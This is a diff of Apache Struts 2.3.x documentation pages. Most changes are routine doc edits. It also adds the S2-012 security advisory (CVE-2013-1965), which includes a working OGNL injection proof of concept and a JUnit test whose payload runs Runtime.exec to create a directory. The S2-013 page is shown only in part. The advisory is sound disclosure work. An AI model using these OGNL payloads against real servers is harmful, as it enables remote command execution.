<DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>Have a suggestion, correction, or improvement? <A href="http://cwiki.apache.org/confluence/display/WW/Home" class="external-link" rel="nofollow">Log in</A> and leave a comment on the appropriate page or file a ticket against the Struts 2 documentation. <A href="contributors-guide.html" title="Contributors Guide">We're always looking for help!</A></TD></TR></TABLE></DIV>
-<P>We've started planning the next version of Struts aka Struts 3 which will break backward compatibility, if you want to join please add your two cents <A href="struts-3.html" title="Struts 3">here</A>.</P>
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>We've started planning the next version of Struts aka Struts 3 (or 2.5) which will break backward compatibility, if you want to join please add your two cents <A href="struts-next.html" title="Struts Next">here</A>.</TD></TR></TABLE></DIV>
<H2><A name="Home-GettingStarted"></A>Getting Started</H2>
@@ -215,7 +215,7 @@ under the License.
<A href="other-resources.html" title="Other Resources">Other Resources</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
- <A href="struts-3.html" title="Struts 3">Struts 3</A>
+ <A href="struts-next.html" title="Struts Next">Struts Next</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
</DIV>
Modified: websites/production/struts/content/release/2.3.x/docs/interceptors.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/interceptors.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/interceptors.html Sun May 26 21:38:59 2013
@@ -581,6 +581,11 @@ under the License.
<TD class="confluenceTd"> Inject cookie with a certain configurable name / value into action. (Since 2.0.7.) </TD>
</TR>
<TR>
+<TD class="confluenceTd"> <A href="cookieprovider-interceptor.html" title="CookieProvider Interceptor">CookieProvider Interceptor</A> </TD>
+<TD class="confluenceTd"> cookieProvider </TD>
+<TD class="confluenceTd"> Transfer cookies from action to response (Since 2.3.15.) </TD>
+</TR>
+<TR>
<TD class="confluenceTd"> <A href="conversion-error-interceptor.html" title="Conversion Error Interceptor">Conversion Error Interceptor</A> </TD>
<TD class="confluenceTd"> conversionError </TD>
<TD class="confluenceTd"> Adds conversion errors from the ActionContext to the Action's field errors </TD>
@@ -686,7 +691,7 @@ under the License.
<TD class="confluenceTd"> Performs validation using the validators defined in <EM>action</EM>-validation.xml </TD>
</TR>
<TR>
-<TD class="confluenceTd"> <A href="workflow-interceptor.html" title="Workflow Interceptor">Workflow Interceptor</A> </TD>
+<TD class="confluenceTd"> <A href="default-workflow-interceptor.html" title="Default Workflow Interceptor">Default Workflow Interceptor</A> </TD>
<TD class="confluenceTd"> workflow </TD>
<TD class="confluenceTd"> Calls the <TT>validate</TT> method in your Action class. If Action errors are created then it returns the <TT>INPUT</TT> view. </TD>
</TR>
@@ -896,7 +901,7 @@ thisWillRunFirstInterceptor
<A href="create-session-interceptor.html" title="Create Session Interceptor">Create Session Interceptor</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
- <A href="workflow-interceptor.html" title="Workflow Interceptor">Workflow Interceptor</A>
+ <A href="default-workflow-interceptor.html" title="Default Workflow Interceptor">Default Workflow Interceptor</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
<A href="exception-interceptor.html" title="Exception Interceptor">Exception Interceptor</A>
Modified: websites/production/struts/content/release/2.3.x/docs/logging.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/logging.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/logging.html Sun May 26 21:38:59 2013
@@ -127,10 +127,10 @@ under the License.
<P>XWork provides its own layer to support logging - it allows to use many different implementations.</P>
-<P>Currently XWork provides support for following libraries:</P>
+<P>Currently XWork provides support for the following libraries (in that order base on classpath discovery):</P>
<UL class="alternate" type="square">
+ <LI>Commons Logging</LI>
<LI>SLF4J</LI>
- <LI>commons-logging</LI>
<LI>JDK Logger</LI>
</UL>
Modified: websites/production/struts/content/release/2.3.x/docs/migration-guide.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/migration-guide.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/migration-guide.html Sun May 26 21:38:59 2013
@@ -129,6 +129,9 @@ under the License.
<H3><A name="MigrationGuide-VersionNotes2.3.x"></A>Version Notes 2.3.x</H3>
<UL>
+ <LI><A href="version-notes-2315.html" title="Version Notes 2.3.15">Version Notes 2.3.15</A></LI>
+ <LI><A href="version-notes-23142.html" title="Version Notes 2.3.14.2">Version Notes 2.3.14.2</A></LI>
+ <LI><A href="version-notes-23141.html" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A></LI>
<LI><A href="version-notes-2314.html" title="Version Notes 2.3.14">Version Notes 2.3.14</A></LI>
<LI><A href="version-notes-2312.html" title="Version Notes 2.3.12">Version Notes 2.3.12</A></LI>
<LI><A href="version-notes-238.html" title="Version Notes 2.3.8">Version Notes 2.3.8</A></LI>
@@ -431,6 +434,12 @@ under the License.
<A href="version-notes-2314.html" title="Version Notes 2.3.14">Version Notes 2.3.14</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
+ <A href="version-notes-23141.html" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A>
+ <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
+ <BR>
+ <A href="version-notes-2315.html" title="Version Notes 2.3.15">Version Notes 2.3.15</A>
+ <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
+ <BR>
</DIV>
</DIV>
Modified: websites/production/struts/content/release/2.3.x/docs/osgi-plugin.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/osgi-plugin.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/osgi-plugin.html Sun May 26 21:38:59 2013
@@ -126,7 +126,7 @@ under the License.
<H2><A name="OSGiPlugin-Overview"></A>Overview</H2>
<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>This plugin is only experimental and can change in the future.</TD></TR></TABLE></DIV>
-<P>This plugin provides support for starting an instance of Apache Felix inside a web application, and scanning installed bundles for Struts configuration. An admin bundle is also provided.</P>
+<P>This plugin provides support for starting an instance of Apache Felix inside a web application, and scanning installed bundles for Struts configuration. An admin bundle is also provided. It can be used with Glassfish 3 as well (Glassfish 3 based on Apache Felix as well), but in such a way <TT>struts.osgi.host</TT> must be defined.</P>
<H2><A name="OSGiPlugin-Features"></A>Features</H2>
@@ -189,10 +189,6 @@ Import-Package: com.opensymphony.xwork2
<SPAN class="code-tag"><constant name=<SPAN class="code-quote">"struts.objectFactory.delegate"</SPAN> value=<SPAN class="code-quote">"springOsgi"</SPAN> /></SPAN>
</PRE>
</DIV></DIV></LI>
-</OL>
-
-
-<OL>
<LI>Configure your <B>web.xml</B> like:
<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
<PRE class="code-xml">
@@ -250,10 +246,6 @@ Import-Package: com.opensymphony.xwork2
<SPAN class="code-tag"></web-app></SPAN>
</PRE>
</DIV></DIV></LI>
-</OL>
-
-
-<OL>
<LI>Add the Spring OSGi, and Spring Web dependencies to your web app, if you are using maven:
<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
<PRE class="code-xml">
@@ -389,6 +381,17 @@ org.springframework.web-2.5.5.A.jar
<SPAN class="code-tag"></context-param></SPAN>
</PRE>
</DIV></DIV>
+
+<P>If you are running your application on Glassfish 3 (which already contains Apache Felix) you must specify <TT>struts.osgi.host</TT>, like below:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><context-param></SPAN>
+ <SPAN class="code-tag"><param-name></SPAN>struts.osgi.host<SPAN class="code-tag"></param-name></SPAN>
+ <SPAN class="code-tag"><param-value></SPAN>Glassfish<SPAN class="code-tag"></param-value></SPAN>
+<SPAN class="code-tag"></context-param></SPAN>
+</PRE>
+</DIV></DIV>
+
<DIV class="table-wrap">
<TABLE class="confluenceTable"><TBODY>
<TR>
Modified: websites/production/struts/content/release/2.3.x/docs/parameters-interceptor.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/parameters-interceptor.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/parameters-interceptor.html Sun May 26 21:38:59 2013
@@ -234,6 +234,22 @@ over ParametersInterceptor which means i
<P>The best idea is to define very tight restrictions with ParametersInterceptor and relax them per action with
@{link ParameterNameAware#acceptableParameterName(String)}</P></TD></TR></TABLE></DIV>
+<H2><A name="ParametersInterceptor-Warningonmissingparameters"></A>Warning on missing parameters</H2>
+
+<P>When there is no setter for given parameter name, a warning message like below will be logged in devMode:</P>
+
+<DIV class="preformatted panel" style="border-width: 1px;"><DIV class="preformattedContent panelContent">
+<PRE>SEVERE: Developer Notification (set struts.devMode to false to disable this message):
+Unexpected Exception caught setting 'search' on 'class demo.ItemSearchAction: Error setting expression 'search' with value ['search', ]
+Error setting expression 'search' with value ['search', ] - [unknown location]
+ at com.opensymphony.xwork2.ognl.OgnlValueStack.handleRuntimeException(OgnlValueStack.java:201)
+ at com.opensymphony.xwork2.ognl.OgnlValueStack.setValue(OgnlValueStack.java:178)
+ at com.opensymphony.xwork2.ognl.OgnlValueStack.setParameter(OgnlValueStack.java:152)
+</PRE>
+</DIV></DIV>
+
+<P>Thus is expected behaviour to allow developer to spot missing setter or typo in either parameter name or setter.</P>
+
<H2><A name="ParametersInterceptor-Examples"></A>Examples</H2>
<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
Added: websites/production/struts/content/release/2.3.x/docs/s2-012.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/s2-012.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/s2-012.html Sun May 26 21:38:59 2013
@@ -0,0 +1,262 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image: url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>S2-012</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+ <A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A> > <A href="home.html" title="Home">Home</A> > <A href="security-bulletins.html" title="Security Bulletins">Security Bulletins</A> > <A href="" title="S2-012">S2-012</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search" method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">S2-012</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818222">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818222">Edit Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818222">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818222">Add Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818222">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818222">Add News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <H2><A name="S2-012-Summary"></A>Summary</H2>
+
+
+<P>Showcase app vulnerability allows remote command execution</P>
+
+
+<DIV class="table-wrap">
+<TABLE class="confluenceTable"><TBODY>
+<TR>
+<TH class="confluenceTh">Who should read this</TH>
+<TD class="confluenceTd">All Struts 2 developers</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Impact of vulnerability</TH>
+<TD class="confluenceTd">Remote command execution</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Maximum security rating</TH>
+<TD class="confluenceTd">Moderately Critical</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Recommendation</TH>
+<TD class="confluenceTd">Developers should immediately upgrade to <A href="http://struts.apache.org/download.cgi#struts23141" class="external-link" rel="nofollow">Struts 2.3.14.1</A></TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Affected Software</TH>
+<TD class="confluenceTd"> Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13 </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Reporter</TH>
+<TD class="confluenceTd"> Xgc Kxlzx, Alibaba Security Team </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">CVE Identifier</TH>
+<TD class="confluenceTd"><A href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1965" class="external-link" rel="nofollow">CVE-2013-1965</A></TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Original Description</TH>
+<TD class="confluenceTd"> Reported directly to security@a.o</TD>
+</TR>
+</TBODY></TABLE>
+</DIV>
+
+<H2><A name="S2-012-Problem"></A>Problem</H2>
+
+<P>OGNL provides, among other features, extensive expression <A href="http://commons.apache.org/ognl/language-guide.html#Expression_Evaluation" class="external-link" rel="nofollow">evaluation capabilities</A>. <BR>
+A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into a property, afterward used as request parameter of a redirect address, which will cause a further evaluation. </P>
+
+<P>OGNL evaluation was already addressed in <A href="s2-003.html" title="S2-003">S2-003</A> and <A href="s2-005.html" title="S2-005">S2-005</A> and <A href="s2-009.html" title="S2-009">S2-009</A>, but, since it involved just the parameter's name, it turned out that the resulting fixes based on whitelisting acceptable parameter names and denying evaluation of the expression contained in parameter names, closed the vulnerability only partially. </P>
+
+<P>The second evaluation happens when redirect result reads it from the stack and uses the previously injected code as redirect parameter.<BR>
+This lets malicious users put arbitrary OGNL statements into any unsanitized String variable exposed by an action and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</P>
+
+<H2><A name="S2-012-Proofofconcept"></A>Proof of concept</H2>
+
+<OL>
+ <LI>Run struts2-showcase</LI>
+ <LI>Open url: <A href="http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV" class="external-link" rel="nofollow">http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV</A></LI>
+ <LI>write skill name to %{expr} for example:
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">%{(#_memberAccess['allowStaticMethodAccess']=<SPAN class="code-keyword">true</SPAN>)(#context['xwork.MethodAccessor.denyMethodExecution']=<SPAN class="code-keyword">false</SPAN>) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}
+</PRE>
+</DIV></DIV></LI>
+ <LI>submit the form</LI>
+</OL>
+
+
+<P>The issue, in order to work, need a redirect result defined as the following:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">
+<action name=<SPAN class="code-quote">"save"</SPAN> class=<SPAN class="code-quote">"org.apache.struts2.showcase.action.SkillAction"</SPAN> method=<SPAN class="code-quote">"save"</SPAN>>
+ <result type=<SPAN class="code-quote">"redirect"</SPAN>>edit.action?skillName=${currentSkill.name}</result>
+</action>
+</PRE>
+</DIV></DIV>
+
+<H3><A name="S2-012-JUnitVersion"></A>JUnit Version</H3>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-java">
+<SPAN class="code-keyword">public</SPAN> void testUnsecureRedirect() {
+ <SPAN class="code-keyword">final</SPAN> <SPAN class="code-object">String</SPAN> pwnDir = <SPAN class="code-quote">"/tmp/PWNAGE"</SPAN>;
+ <SPAN class="code-keyword">final</SPAN> Map<<SPAN class="code-object">String</SPAN>, <SPAN class="code-object">String</SPAN>> fakeAction = <SPAN class="code-keyword">new</SPAN> HashMap<<SPAN class="code-object">String</SPAN>, <SPAN class="code-object">String</SPAN>>() {
+ {
+ put(<SPAN class="code-quote">"skillName"</SPAN>, <SPAN class="code-quote">"%{(#context['xwork.MethodAccessor.denyMethodExecution']=<SPAN class="code-keyword">false</SPAN>)(#_memberAccess['allowStaticMethodAccess']=<SPAN class="code-keyword">true</SPAN>)(@java.lang.<SPAN class="code-object">Runtime</SPAN>@getRuntime().exec('mkdir "</SPAN> + pwnDir + <SPAN class="code-quote">"'))}"</SPAN>);
+ }
+ };
+
+ <SPAN class="code-object">String</SPAN> location = <SPAN class="code-quote">"/context/edit.action?skillName=<SPAN class="code-keyword">true</SPAN>"</SPAN>;
+ responseMock.expectAndReturn(<SPAN class="code-quote">"encodeRedirectURL"</SPAN>, C.anyArgs(1), location);
+ responseMock.expect(<SPAN class="code-quote">"sendRedirect"</SPAN>, C.args(C.eq(location)));
+ requestMock.expectAndReturn(<SPAN class="code-quote">"getAttribute"</SPAN>, C.args(C.eq(<SPAN class="code-quote">"javax.servlet.include.servlet_path"</SPAN>)), location);
+
+ ValueStack stack = ai.getStack();
+ stack.push(fakeAction);
+
+ view.setLocation(<SPAN class="code-quote">"edit.action?skillName=${skillName}"</SPAN>);
+ view.setParse(<SPAN class="code-keyword">true</SPAN>);
+
+
+ <SPAN class="code-keyword">try</SPAN> {
+ view.execute(ai);
+
+ requestMock.verify();
+
+ File pwn = <SPAN class="code-keyword">new</SPAN> File(pwnDir);
+ <SPAN class="code-object">boolean</SPAN> exists = pwn.exists();
+ FileUtils.deleteDirectory(pwn);
+ assertFalse(<SPAN class="code-quote">"Remote exploit: The PWN folder has been created"</SPAN>, exists);
+
+ <SPAN class="code-object">Object</SPAN> dme = stack.getContext().get(<SPAN class="code-quote">"xwork.MethodAccessor.denyMethodExecution"</SPAN>);
+
+ assertTrue(<SPAN class="code-quote">"DenyMethodExecution has been disabled"</SPAN>, dme == <SPAN class="code-keyword">null</SPAN> || BooleanUtils.toBoolean(dme.toString()));
+
+ } <SPAN class="code-keyword">catch</SPAN> (Exception e) {
+ e.printStackTrace();
+ fail();
+ }
+}
+</PRE>
+</DIV></DIV>
+<H2><A name="S2-012-Solution"></A>Solution</H2>
+
+<P>The OGNLUtil class was changed to deny eval expressions by default. </P>
+
+<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is strongly recommended to upgrade to <A href="http://struts.apache.org/download.cgi#struts23141" class="external-link" rel="nofollow">Struts 2.3.14.1</A>, which contains the corrected OGNL and XWork library.</B></TD></TR></TABLE></DIV>
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file
Added: websites/production/struts/content/release/2.3.x/docs/s2-013.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/s2-013.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/s2-013.html Sun May 26 21:38:59 2013
@@ -0,0 +1,237 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image: url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>S2-013</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+ <A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A> > <A href="home.html" title="Home">Home</A> > <A href="security-bulletins.html" title="Security Bulletins">Security Bulletins</A> > <A href="" title="S2-013">S2-013</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search" method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">S2-013</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818224">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818224">Edit Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818224">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818224">Add Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818224">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818224">Add News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <H2><A name="S2-013-Summary"></A>Summary</H2>
+
+
+<P>A vulnerability, present in the <EM>includeParams</EM> attribute of the <EM>URL</EM> and <EM>Anchor</EM> Tag, allows remote command execution</P>
+
+
+<DIV class="table-wrap">
+<TABLE class="confluenceTable"><TBODY>
+<TR>
+<TH class="confluenceTh">Who should read this</TH>
+<TD class="confluenceTd">All Struts 2 developers</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Impact of vulnerability</TH>
+<TD class="confluenceTd">Remote command execution</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Maximum security rating</TH>
+<TD class="confluenceTd">High Critical</TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Recommendation</TH>
+<TD class="confluenceTd">Developers should immediately upgrade to <A href="http://struts.apache.org/download.cgi#struts23141" class="external-link" rel="nofollow">Struts 2.3.14.1</A></TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Affected Software</TH>
+<TD class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14 </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">Reporter</TH>
+<TD class="confluenceTd"> The Struts Team </TD>
+</TR>
+<TR>
+<TH class="confluenceTh">CVE Identifier</TH>
+<TD class="confluenceTd"><A href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966" class="external-link" rel="nofollow">CVE-2013-1966</A></TD>
+</TR>
+</TBODY></TABLE>
+</DIV>
+
+<H2><A name="S2-013-Problem"></A>Problem</H2>
+
